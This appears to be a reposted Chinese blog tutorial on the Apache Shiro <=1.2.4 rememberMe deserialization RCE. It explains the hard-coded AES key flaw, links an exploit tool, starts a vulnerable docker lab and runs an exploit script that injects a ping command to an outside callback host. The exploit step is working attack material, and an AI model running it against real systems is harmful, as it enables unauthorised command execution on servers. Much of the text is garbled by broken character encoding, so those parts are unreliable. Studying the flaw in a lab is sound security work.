Apache Shiro<=1.2.4反序列化RCE漏洞
版本:Apache Shiro<=1.2.4
介紹:Apache Shiro是一個(gè)強(qiáng)大且易用的Java安全框架,執(zhí)行身份驗(yàn)證、授權(quán)、密碼和會(huì)話管理。
漏洞原因:因?yàn)閟hiro對(duì)cookie里的rememberme字段進(jìn)行了反序列化,所以如果知道了shiro的編碼方式,然后將惡意命令用它的編碼方式進(jìn)行編碼并放在http頭的cookie里,在shiro對(duì)提交的cookie的rememberme字段進(jìn)行反序列化時(shí),也就執(zhí)行了插入的命令,最終造成了命令執(zhí)行
shiro默認(rèn)使用了CookieRememberMeManager,其處理cookie的流程是:得到rememberMe的cookie值-->Base64解碼-->AES解密-->反序列化
然而AES的密鑰是硬編碼的,就導(dǎo)致了攻擊者可以構(gòu)造惡意數(shù)據(jù)造成反序列化的RCE漏洞。
漏洞驗(yàn)證:
漏洞利用:
利用工具:https://github.com/sv3nbeast/ShiroScan
如果沒有該鏡像的話可以去在docker里面拉取環(huán)境docker pull medicean/vulapps:s_shiro_1,已經(jīng)有人準(zhǔn)備好了的
1、sudo docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
2、python shiro_rce.py http://192.168.1.143 "ping 0wtpsg.ceye.io"
?參考文章:https://www.t00ls.net/viewthread.php?tid=52744&highlight=shiro
總結(jié)
以上是生活随笔為你收集整理的Apache Shiro<=1.2.4反序列化RCE漏洞的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 第八篇——Struts2的处理结果类型
- 下一篇: node.js实现图片上传(包含缩略图)